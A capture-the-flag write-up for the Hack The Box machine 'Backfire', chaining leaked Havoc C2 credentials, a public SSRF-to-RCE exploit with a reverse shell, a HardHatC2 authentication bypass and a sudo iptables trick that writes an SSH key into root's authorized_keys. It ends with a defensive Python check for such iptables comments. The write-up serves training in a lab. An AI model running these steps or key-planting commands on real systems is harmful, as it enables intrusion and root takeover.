Hack The Box / LINUX / 2025-01-25
Hack The Box — Backfire (Linux)
Exposed Havoc config leaks operator creds, SSRF-to-RCE lands shell as ilya, HardHatC2 auth bypass gives command execution as sergej, and sudo iptables abuse writes root authorized_keys.
Target
- IP: 10.129.234.64
Recon
sudo nmap -sC -sV 10.129.234.64 -p- -T5 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA)
|_ 256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519)
443/tcp open ssl/http nginx 1.22.1
| tls-alpn:
| http/1.1
| http/1.0
|_ http/0.9
| ssl-cert: Subject: commonName=127.0.0.1/stateOrProvinceName=Arizona/countryName=US
| Subject Alternative Name: IP Address:127.0.0.1
| Issuer: commonName=127.0.0.1/stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-08T18:59:38
| Not valid after: 2027-08-08T18:59:38
| MD5: 08c5:558e:cfd7:715b:2b36:b559:193c:abfd
|_SHA-1: 5495:7eda:84c3:70fd:fd8f:509c:8667:76a8:4f35:1e58
|_http-server-header: nginx/1.22.1
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
5000/tcp filtered upnp
7096/tcp filtered unknown
8000/tcp open http nginx 1.22.1
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-ls: Volume /
| SIZE TIME FILENAME
| 1559 17-Dec-2024 11:31 disable_tls.patch
| 875 17-Dec-2024 11:34 havoc.yaotl
|_
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Index of /
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Go to http://10.129.234.64:8000/.
We can download two files:
- disable_tls.patch
- havoc.yaotl
In havoc.yaotl we find operator credentials:
Operators {
    user "ilya" {
        Password = "CobaltStr1keSuckz!"
    }
    user "sergej" {
        Password = "1w4nt2sw1tch2h4rdh4tc2"
    }
}
If we try connecting with SSH, it does not work.
We also find the teamserver and listener configuration:
Teamserver {
    Host = "127.0.0.1"
    Port = 40056
    Listeners {
        Http {
            Name = "Demon Listener"
            Hosts = [
                "backfire.htb"
            ]
            HostBind = "127.0.0.1"
            PortBind = 8443
            PortConn = 8443
            HostRotation = "round-robin"
            Secure = true
        }
    }
}
Add backfire.htb to /etc/hosts.
We know the target host runs Havoc (https://github.com/HavocFramework/Havoc).
There is a known SSRF in the Havoc teamserver (CVE-2024-41570) with a public PoC:
https://github.com/chebuya/Havoc-C2-SSRF-poc
git clone https://github.com/chebuya/Havoc-C2-SSRF-poc.git
openssl req -newkey rsa:4096 -nodes -keyout key.pem -x509 -days 365 -out cert.pem
sudo openssl s_server -accept 443 -key key.pem -cert cert.pem
Open Havoc client.
Connect to 127.0.0.1 on port 443.
In the openssl s_server terminal we get:
GET /havoc/ HTTP/1.1
Host: 127.0.0.1:443
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: R5wVBy5K2K8Vd052q9nzUg==
Sec-WebSocket-Version: 13
Now we need to modify the PoC exploit so it sends the request above.
request_data = b"GET /havoc/ HTTP/1.1\r\nHost: www.example.com\r\nConnection: Upgrade\r\nUpgrade: websocket\r\nSec-WebSocket-Key: R5wVBy5K2K8Vd052q9nzUg==\r\nSec-WebSocket-Version: 13\r\n\r\n"
We do not get anything in response.
We also tried a TLS socket server and sending messages with Havoc client, but it did not work.
There is another, newer PoC tailored to this machine:
https://github.com/HimmeL-Byte/CVE-2024-41570-SSRF-RCE
git clone https://github.com/HimmeL-Byte/CVE-2024-41570-SSRF-RCE.git
cd CVE-2024-41570-SSRF-RCE
Modify payload.sh with your own IP and port.
Start an HTTP server:
python3 -m http.server 80
Start a netcat listener:
nc -vlnp 4444
Modify exploit.py with your HTTP server URL.
python3 exploit.py --target https://backfire.htb/ -i 127.0.0.1 -p 40056
We get a reverse shell as user ilya.
On attacker machine:
ssh-keygen -f ilya_key
Copy the public key.
On target machine:
cd
echo '<public_key>' >> .ssh/authorized_keys
On attacker machine:
ssh -i ilya_key ilya@backfire.htb
We get an SSH session.
cat hardhat.txt
Sergej said he installed HardHatC2 for testing and not made any changes to the defaults
I hope he prefers Havoc bcoz I don't wanna learn another C2 framework, also Go > C#
ss -ltpn
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.1:40056 0.0.0.0:*
LISTEN 0 511 0.0.0.0:8000 0.0.0.0:*
LISTEN 0 512 0.0.0.0:5000 0.0.0.0:*
LISTEN 0 512 0.0.0.0:7096 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:8443 0.0.0.0:*
LISTEN 0 511 0.0.0.0:443 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*
HardHatC2 by default listens on port 7096.
ssh ilya@backfire.htb -i ilya_key -NL 5000:localhost:5000 -NL 7096:localhost:7096
Useful reference:
https://blog.sth.sh/hardhatc2-0-days-rce-authn-bypass-96ba683d9dd7
Copy the PoC script into file exp.py.
In exp.py, set:
rhost = 'localhost:5000'
Run it:
python3 exp.py
A user sth_pentest with password sth_pentest is created.
Go to https://localhost:7096/.
Log in with these credentials.
Go to https://localhost:7096/ImplantInteract.
Click Add tab.
We have a terminal and can execute commands.
On our machine:
ssh-keygen -f sergej_key
In the server terminal:
echo '<public_key>' >> /home/sergej/.ssh/authorized_keys
On our machine run:
ssh -i sergej_key sergej@backfire.htb
We get an SSH session as sergej.
sudo -l
Matching Defaults entries for sergej on backfire:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User sergej may run the following commands on backfire:
(root) NOPASSWD: /usr/sbin/iptables
(root) NOPASSWD: /usr/sbin/iptables-save
Useful reference:
https://www.shielder.com/blog/2024/09/a-journey-from-sudo-iptables-to-local-privilege-escalation/
On attacker machine:
ssh-keygen -f root_key
On target machine, as sergej, store the public key inside a rule comment (iptables accepts embedded newlines in comments):
sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\n<public_key>\n'
sudo iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 5000 -j ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 5000 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 5000 -j REJECT --reject-with icmp-port-unreachable
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 7096 -j ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 7096 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 7096 -j REJECT --reject-with icmp-port-unreachable
-A INPUT -i lo -m comment --comment "
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEBgcsLPGaE6KN7KBjg33vZFjapBhAOzbE1p6daDq0Z+ kali@kali
" -j ACCEPT
sudo iptables-save -f /root/.ssh/authorized_keys
ssh -i root_key root@backfire.htb
We get an SSH session as root.
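A defender-side check for the privilege-escalation trick above, added here as an example (it is not part of the original writeup): it parses `iptables-save` output and flags rule comments that carry control characters or SSH public-key material, which is what the `-f /root/.ssh/authorized_keys` write relies on. It assumes iptables-save renders a multi-line comment with raw newlines inside the quotes, as `iptables -S` does above; the sample rules and the key material in them are constructed placeholders.

```python
import re

# Constructed sample of `iptables-save` output, modelled on the `iptables -S`
# listing from the box. The "key" inside the comment is a placeholder, not a real key.
SAMPLE_IPTABLES_SAVE = (
    "# Generated by iptables-save\n"
    "*filter\n"
    ":INPUT ACCEPT [0:0]\n"
    ":FORWARD ACCEPT [0:0]\n"
    ":OUTPUT ACCEPT [0:0]\n"
    "-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 7096 -j ACCEPT\n"
    "-A INPUT -p tcp -m tcp --dport 7096 -j REJECT --reject-with icmp-port-unreachable\n"
    '-A INPUT -i lo -m comment --comment "\n'
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI<PLACEHOLDER_KEY_MATERIAL> attacker@example\n"
    '" -j ACCEPT\n'
    '-A INPUT -i lo -m comment --comment "allow loopback" -j ACCEPT\n'
    "COMMIT\n"
)

# A --comment argument is either a quoted string (may span lines, may contain
# backslash-escaped quotes) or a single unquoted token.
COMMENT_RE = re.compile(r'--comment\s+(?:"((?:[^"\\]|\\.)*)"|(\S+))', re.DOTALL)
# OpenSSH public-key line: key type followed by base64 starting with "AAAA".
SSH_KEY_RE = re.compile(r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+AAAA")


def audit_iptables_comments(saved_rules):
    """Return one finding per suspicious --comment in iptables-save output.

    Each finding records the 1-based line where the rule starts, the comment
    text (stripped) and the reasons it was flagged. A legitimate comment
    never needs a newline, so any control character is itself a red flag.
    """
    findings = []
    for m in COMMENT_RE.finditer(saved_rules):
        comment = m.group(1) if m.group(1) is not None else m.group(2)
        reasons = []
        if any(ord(c) < 0x20 for c in comment):
            reasons.append("control character (newline) in comment")
        if SSH_KEY_RE.search(comment):
            reasons.append("SSH public key material in comment")
        if reasons:
            line_no = saved_rules.count("\n", 0, m.start()) + 1
            findings.append({"line": line_no, "comment": comment.strip(), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_iptables_comments(SAMPLE_IPTABLES_SAVE):
        print(f"line {f['line']}: {', '.join(f['reasons'])}: {f['comment'][:60]!r}")
```

Run it against real output with `sudo iptables-save | python3 audit.py` after replacing the sample with `sys.stdin.read()`; the real fix is to drop the NOPASSWD `iptables-save` entry, since `-f` lets it write any file as root.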